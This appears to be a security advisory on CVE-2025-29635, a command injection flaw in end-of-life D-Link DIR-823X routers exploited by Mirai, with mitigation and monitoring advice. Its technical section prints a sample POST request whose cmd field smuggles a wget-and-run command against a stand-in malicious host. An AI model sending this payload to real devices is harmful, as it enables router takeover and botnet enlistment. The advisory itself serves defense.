CVE-2025-29635 – High Severity Command Injection in D-Link DIR-823X Routers
The CVE-2025-29635 vulnerability, rated High (CVSS 7.2), enables remote command execution on legacy D‑Link DIR‑823X routers via a crafted POST request. Active exploitation by the Mirai botnet has been observed in the wild, making this a pressing risk for any network still running these end‑of‑life devices.
Key Takeaways
- Severity: High (CVSS 7.2) – remote code execution.
- Impact: Full system compromise; devices can be conscripted into DDoS botnets.
- Affected: Legacy D‑Link DIR‑823X routers (firmware 240126, 240802) and similar EOL models.
- Current Threat: Active exploitation by the Mirai botnet (reports since March 2026).
- Action: Apply vendor mitigations, isolate or retire affected hardware, and monitor for suspicious POST traffic.
Overview
- Discovery: Public proof‑of‑concept (PoC) was released in early 2025, describing a command injection flaw in the
/goform/set_prohibitingendpoint. The vulnerability was added to the CISA Known Exploited Vulnerabilities (KEV) catalog on 2026‑04‑24 (CISA KEV). - Threat Landscape: Since March 2026, multiple security researchers have observed the Mirai botnet leveraging this flaw to compromise exposed D‑Link routers and enlist them in large‑scale DDoS campaigns.
- Live Intelligence: For real‑time signal data, exploitation trends, and indicator spikes, see the VulnSocial CVE page.
Technical Details
- Vulnerability type: CWE‑77 (Command Injection).
- Vulnerable endpoint:
POST /goform/set_prohibiting. - Root cause: The
cmdparameter is passed directly to the system shell without sanitization, allowing an attacker with authenticated access (or default credentials) to execute arbitrary commands. - Exploit example:
POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=abcdef
cmd=;wget http://malicious.example/payload.sh;sh payload.sh
- Authentication requirement: The CVSS vector indicates
PR:H(privileged user). In practice, Mirai exploits default or weak credentials that are common on exposed routers. - Impact of successful exploitation: Full OS command execution, enabling the attacker to install malware, modify DNS settings, or join the device to a botnet.
Severity & Impact
| Metric | Value |
|---|---|
| CVE ID | CVE-2025-29635 |
| Severity | High |
| CVSS | 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE‑77 |
| Impact | Remote code execution → full system compromise, data exfiltration, DDoS enlistment. |
The combination of network‑accessible management interfaces and default credentials makes the risk especially acute for home and small‑office networks.
Affected Products
- Vendor: D‑Link
- Model: DIR‑823X
- Firmware versions: 240126, 240802 (EOL)
For the complete list of affected products and versions, see the CVE page.
Actionable Insights – What to Do Now
- Inventory: Identify any D‑Link DIR‑823X routers on your network. Verify firmware version via the admin UI or
show versioncommand. - Patch or Update: If a vendor‑issued patch or newer firmware is available, apply it immediately. (See vendor advisory linked in References.)
- Mitigate if No Patch:
- Disable WAN access to the router’s management interface.
- Enforce strong, unique passwords; disable default credentials.
- Restrict management traffic to trusted internal IP ranges via firewall rules.
- Network Segmentation: Place IoT/consumer routers on a separate VLAN or subnet, limiting lateral movement.
- Decommission: For devices that cannot be patched, consider replacing them with supported hardware. Follow the CISA KEV guidance: “Apply mitigations per vendor instructions, or discontinue use if mitigations are unavailable.”
- Monitor:
- Look for outbound HTTP POST requests to
/goform/set_prohibiting. - Detect unusual DNS queries or traffic to known Mirai C2 domains.
- Use IDS/IPS signatures that flag the specific request pattern.
- Look for outbound HTTP POST requests to
Bottom Line
The CVE-2025-29635 command injection flaw in legacy D‑Link DIR‑823X routers is high‑severity and actively weaponized by the Mirai botnet. Immediate inventory, patching or isolation, and strict network controls are essential to prevent compromise and botnet recruitment.
References
- PoC and technical details: https://github.com/mono7s/Dir-823x/blob/main/set_prohibiting/set_prohibiting.md
- Akamai SIRT analysis of the Mirai campaign: https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices
- CISA Known Exploited Vulnerabilities Catalog entry: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-29635
#CVE #CVE202529635 #High #CommandInjection #DLink #MiraiBotnet #CISAKEV #RCE
